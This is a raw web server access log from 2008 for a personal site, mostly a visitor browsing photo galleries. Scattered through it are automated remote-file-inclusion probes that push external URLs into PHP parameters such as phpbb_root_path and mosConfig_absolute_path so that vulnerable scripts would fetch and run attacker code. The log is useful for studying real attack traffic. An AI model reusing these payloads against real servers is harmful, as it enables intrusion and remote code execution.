72.199.235.196 - - [20/Sep/2008:09:31:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-148_1.jpg HTTP/1.1" 200 367971 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:34 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0168.jpg HTTP/1.1" 200 386333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
193.91.27.99 - - [20/Sep/2008:09:31:37 -0700] "GET /logs/access_080826.log%20/index.php?inc_dir=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id5.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:39 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0034.jpg HTTP/1.1" 200 278838 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:44 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0158.jpg HTTP/1.1" 200 306017 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:45 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-006_4.jpg HTTP/1.1" 200 401107 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:47 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0173.jpg HTTP/1.1" 200 357822 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
24.47.133.61 - - [20/Sep/2008:09:31:50 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://piti.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
24.47.133.61 - - [20/Sep/2008:09:31:50 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://piti.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:51 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0035.jpg HTTP/1.1" 200 391510 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-113_1.jpg HTTP/1.1" 200 390057 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:31:57 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-269.jpg HTTP/1.1" 200 301108 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0101.jpg HTTP/1.1" 200 483322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:09 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-175.jpg HTTP/1.1" 200 279139 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-096_1.jpg HTTP/1.1" 200 402460 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:11 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0164.jpg HTTP/1.1" 200 386584 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:14 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1009.jpg HTTP/1.1" 200 366579 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
64.13.223.140 - - [20/Sep/2008:09:32:15 -0700] "GET /logs/access_080601.log/administrator/index2.php?mosConfig_absolute_path=http://escortreview.com/_notes/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.223.140 - - [20/Sep/2008:09:32:15 -0700] "GET /logs/administrator/index2.php?mosConfig_absolute_path=http://escortreview.com/_notes/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:16 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0023.jpg HTTP/1.1" 200 503948 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:22 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-047.jpg HTTP/1.1" 200 551431 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:22 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-253.jpg HTTP/1.1" 200 323430 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:23 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0149.jpg HTTP/1.1" 200 385604 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:29 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0131.jpg HTTP/1.1" 200 515079 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
71.160.224.35 - - [20/Sep/2008:09:32:32 -0700] "GET //?sIncPath=http://todhostel.com/main/modules/.bash/test.txt? HTTP/1.1" 200 92280 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:09:32:35 -0700] "GET /logs//?sIncPath=http://todhostel.com/main/modules/.bash/test.txt? HTTP/1.1" 200 65882 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:36 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-131.jpg HTTP/1.1" 200 663113 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:38 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1007.jpg HTTP/1.1" 200 267149 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
74.6.18.225 - - [20/Sep/2008:09:32:38 -0700] "GET /bikes/dteel/2008_08_17/?M=A HTTP/1.0" 200 983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:42 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0043.jpg HTTP/1.1" 200 383421 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-015_1.jpg HTTP/1.1" 200 558864 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
200.11.67.242 - - [20/Sep/2008:09:32:47 -0700] "GET //common/db.php?commonpath=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:47 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0160.jpg HTTP/1.1" 200 386726 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
218.239.45.154 - - [20/Sep/2008:09:32:48 -0700] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.154 - - [20/Sep/2008:09:32:48 -0700] "GET /logs/access_080907.log//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.154 - - [20/Sep/2008:09:32:48 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.48 - - [20/Sep/2008:09:32:48 -0700] "GET /logs/access_080828.log/pages.php?page=http://www.geocities.com/desirisma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:49 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-022_4.jpg HTTP/1.1" 200 269077 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:50 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1018.jpg HTTP/1.1" 200 338681 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:32:55 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0058.jpg HTTP/1.1" 200 409366 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:00 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0167.jpg HTTP/1.1" 200 399577 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:00 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0055.jpg HTTP/1.1" 200 482637 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
217.75.193.70 - - [20/Sep/2008:09:33:01 -0700] "GET /logs/access_080816.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [20/Sep/2008:09:33:01 -0700] "GET /logs/access_080812.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:02 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-030_1.jpg HTTP/1.1" 200 376923 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:02 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1024.jpg HTTP/1.1" 200 269847 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:08 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0030.jpg HTTP/1.1" 200 422859 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:13 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0147.jpg HTTP/1.1" 200 421697 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-058.jpg HTTP/1.1" 200 346083 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:15 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-273.jpg HTTP/1.1" 200 261409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:15 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1011.jpg HTTP/1.1" 200 306043 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:20 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0048.jpg HTTP/1.1" 200 344028 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:25 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0152.jpg HTTP/1.1" 200 335197 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-127.jpg HTTP/1.1" 200 647576 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-054_1.jpg HTTP/1.1" 200 327782 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
74.6.22.103 - - [20/Sep/2008:09:33:27 -0700] "GET /blog/wp-content/uploads/?N=D HTTP/1.0" 200 3214 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:28 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1014.jpg HTTP/1.1" 200 465585 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
67.43.6.114 - - [20/Sep/2008:09:33:29 -0700] "GET /logs/administrator/index2.php?mosConfig_absolute_path=http://escortreview.com/_notes/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:33 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0080.jpg HTTP/1.1" 200 410742 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:37 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0177.jpg HTTP/1.1" 200 348079 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:38 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-019_0.jpg HTTP/1.1" 200 337842 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-003_1.jpg HTTP/1.1" 200 284519 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
204.11.244.85 - - [20/Sep/2008:09:33:42 -0700] "GET /logs/access_080714.log/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://inacio.info/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.239.45.184 - - [20/Sep/2008:09:33:44 -0700] "GET /logs/access_080907.log//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.184 - - [20/Sep/2008:09:33:44 -0700] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.184 - - [20/Sep/2008:09:33:45 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:45 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0118.jpg HTTP/1.1" 200 395556 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:49 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0166.jpg HTTP/1.1" 200 298247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:51 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-292.jpg HTTP/1.1" 200 332939 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:51 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-013_1.jpg HTTP/1.1" 200 523788 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
64.15.129.168 - - [20/Sep/2008:09:33:51 -0700] "GET /logs/access_080331.log//_head.php?_zb_path=http://pronetec.com/images/wind.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:33:58 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0042.jpg HTTP/1.1" 200 294874 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:03 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0171.jpg HTTP/1.1" 200 345976 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
203.22.204.48 - - [20/Sep/2008:09:34:04 -0700] "GET /index2.php?content=http://www.geocities.com/desirisma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.11.67.242 - - [20/Sep/2008:09:34:05 -0700] "GET //common/db.php?commonpath=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-046_2.jpg HTTP/1.1" 200 432801 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
218.239.45.184 - - [20/Sep/2008:09:34:10 -0700] "GET /logs/access_080907.log//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.184 - - [20/Sep/2008:09:34:10 -0700] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.184 - - [20/Sep/2008:09:34:10 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:12 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0032.jpg HTTP/1.1" 200 305289 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:16 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0165.jpg HTTP/1.1" 200 364141 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:18 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-012.jpg HTTP/1.1" 200 395565 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:19 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-147_0.jpg HTTP/1.1" 200 295440 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
203.22.204.48 - - [20/Sep/2008:09:34:19 -0700] "GET /logs/access_080601.log/folder.php?id=http://www.geocities.com/desirisma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.48 - - [20/Sep/2008:09:34:19 -0700] "GET /logs/folder.php?id=http://www.geocities.com/desirisma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:25 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0103.jpg HTTP/1.1" 200 432789 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
62.213.74.86 - - [20/Sep/2008:09:34:25 -0700] "GET /logs//ashnews.php?pathtoashnews=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.74.86 - - [20/Sep/2008:09:34:25 -0700] "GET //ashnews.php?pathtoashnews=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.45.184 - - [20/Sep/2008:09:34:28 -0700] "GET /logs/access_080907.log//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:28 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0140.jpg HTTP/1.1" 200 351155 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
218.239.45.184 - - [20/Sep/2008:09:34:28 -0700] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.184 - - [20/Sep/2008:09:34:28 -0700] "GET /logs//plugins/safehtml/safehtml.php?dir[plugins]=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:34:29 -0700] "GET /logs/access_080219.log//update/update5.php?lang=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:34:30 -0700] "GET //update/update5.php?lang=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:34:30 -0700] "GET /logs//update/update5.php?lang=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:31 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-163.jpg HTTP/1.1" 200 399085 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:31 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-086_1.jpg HTTP/1.1" 200 401229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:37 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0039.jpg HTTP/1.1" 200 531041 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:41 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0138_0.jpg HTTP/1.1" 200 386052 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:44 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-061_0.jpg HTTP/1.1" 200 509282 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0057.jpg HTTP/1.1" 200 386259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:53 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0146.jpg HTTP/1.1" 200 344149 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:55 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-145_1.jpg HTTP/1.1" 200 343530 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:34:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-065_1.jpg HTTP/1.1" 200 473306 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:35:03 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0086.jpg HTTP/1.1" 200 531628 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
116.125.113.115 - - [20/Sep/2008:09:35:04 -0700] "GET /logs/access_080413.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
